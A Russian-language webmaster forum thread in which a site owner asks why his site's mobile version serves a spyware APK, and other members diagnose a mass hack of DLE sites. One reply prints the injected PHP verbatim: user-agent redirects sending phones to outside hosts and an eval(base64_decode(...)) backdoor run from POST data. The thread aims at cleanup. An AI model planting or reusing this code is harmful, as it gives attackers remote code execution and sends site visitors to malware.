редирект с мобильной версии сайта на browser_update_install.apk

Автор Тема: редирект с мобильной версии сайта на browser_update_install.apk  (Прочитано 3358 раз)

Оффлайн paulicАвтор темы

  • Бизнес оценка: (0)
  • Пользователь
  • **
  • СПАСИБО: 6
  • Сообщений: 95
  • Карма: 3
  • Награды SEO-специалист

Оффлайн paulicАвтор темы

  • Пользователь
  • **
столкнулся с такой проблемой:
есть сайт RUS.kg работает нормально, но увы мобильная версия (при условие запуска с мобильного телефона) загружает вместо сайт какую-то шпионскую программу browser_update_install.apk

кто-нить сталкивался с таким? если да то подскажите как вылечить


Оффлайн Morfiy

  • Бизнес оценка: (2, 100%)
  • КМС
  • *****
  • СПАСИБО: 718
  • Сообщений: 1609
  • Карма: 72
  • Пол: Мужской
  • Один сын - хорошо, а два - еще лучше))
  • Награды КМС поисковой оптимизации
    • Все объявления Минска

Оффлайн Morfiy

  • КМС
  • *****
  • Доп. информация
    • Бизнес оценка: (2, 100%)
    • СПАСИБО: 718
    • Сообщений: 1609
    • Карма: 72
    • Пол: Мужской
    • Один сын - хорошо, а два - еще лучше))
    • Награды КМС поисковой оптимизации
      • Все объявления Минска
paulic, выложите сюда файл .htaccess, скорее всего через него сделали редирект.

Оффлайн snegovik

  • Бизнес оценка: (1, 100%)
  • Ветеран
  • *****
  • СПАСИБО: 715
  • Сообщений: 1115
  • Карма: 70
  • Пол: Мужской
  • Я не СЕОшник, я только учусь :))))
  • Награды КМС поисковой оптимизации
    • Форум общения хороших людей

Оффлайн snegovik

  • Ветеран
  • *****
  • Доп. информация
    • Бизнес оценка: (1, 100%)
    • СПАСИБО: 715
    • Сообщений: 1115
    • Карма: 70
    • Пол: Мужской
    • Я не СЕОшник, я только учусь :))))
    • Награды КМС поисковой оптимизации
      • Форум общения хороших людей
В начале января огромное количество DLE было взломано. Т.к это явление было массовым, думаю ломали автоматизированным скриптом.
Редирект содержит следующий код -
Код:
Только зарегистрированные пользователи могут видеть код. Пожалуйста, войдите или зарегистрируйтесь.
Проверяйте все файлы. Но в основном, этот код находиться в этих:
 /engine/data/config.php
 /engine/data/dbconfig.php
 /engine/init.php
 index.php

У меня лично был в этих файлах. Может ещё где найду.

Оффлайн kinozal

  • Бизнес оценка: (0)
  • Дебютант
  • *
  • СПАСИБО: 1
  • Сообщений: 4
  • Карма: 0

Оффлайн kinozal

  • Дебютант
  • *
Привет !!!!
это тоже оно

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
    header('Location: http://statuses.ws/');
}$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
    header('Location: http://statuses.ws/');
}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yandex-google.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));$tpl->compile ( 'main' );
$tpl->result['main'] = str_ireplace( '{THEME}', $config['http_home_url'] . 'templates/' . $config['skin'], $tpl->result['main'] );
if ($replace_url) $tpl->result['main'] = str_replace ( $replace_url[0]."/", $replace_url[1]."/", $tpl->result['main'] );
$tpl->result['main'] = str_replace ( '<img src="http://'.$_SERVER['HTTP_HOST'].'/', '<img src="/', $tpl->result['main'] );

Оффлайн paulicАвтор темы

  • Бизнес оценка: (0)
  • Пользователь
  • **
  • СПАСИБО: 6
  • Сообщений: 95
  • Карма: 3
  • Награды SEO-специалист

Оффлайн paulicАвтор темы

  • Пользователь
  • **
/engine/data/config.php
 /engine/data/dbconfig.php
 /engine/init.php
 index.php


странно эти файлы чистые


Добавлено: 19-03-2013, 21:27:58

 /engine/data/config.php
 /engine/data/dbconfig.php
 /engine/init.php
 index.php


странно эти файлы чистые
« Последнее редактирование: 19-03-2013, 21:27:58 от paulic »


 

Похожие темы

  Тема / Автор Ответов Последний ответ
5 Ответов
7263 Просмотров
Последний ответ 10-05-2011, 14:17:39
от Владимир75
8 Ответов
4105 Просмотров
Последний ответ 05-01-2014, 16:21:54
от Clever
3 Ответов
6189 Просмотров
Последний ответ 31-03-2013, 21:10:49
от bibika
2 Ответов
2191 Просмотров
Последний ответ 05-01-2015, 19:21:17
от ВикторияИ
0 Ответов
800 Просмотров
Последний ответ 22-08-2016, 12:35:40
от shoplte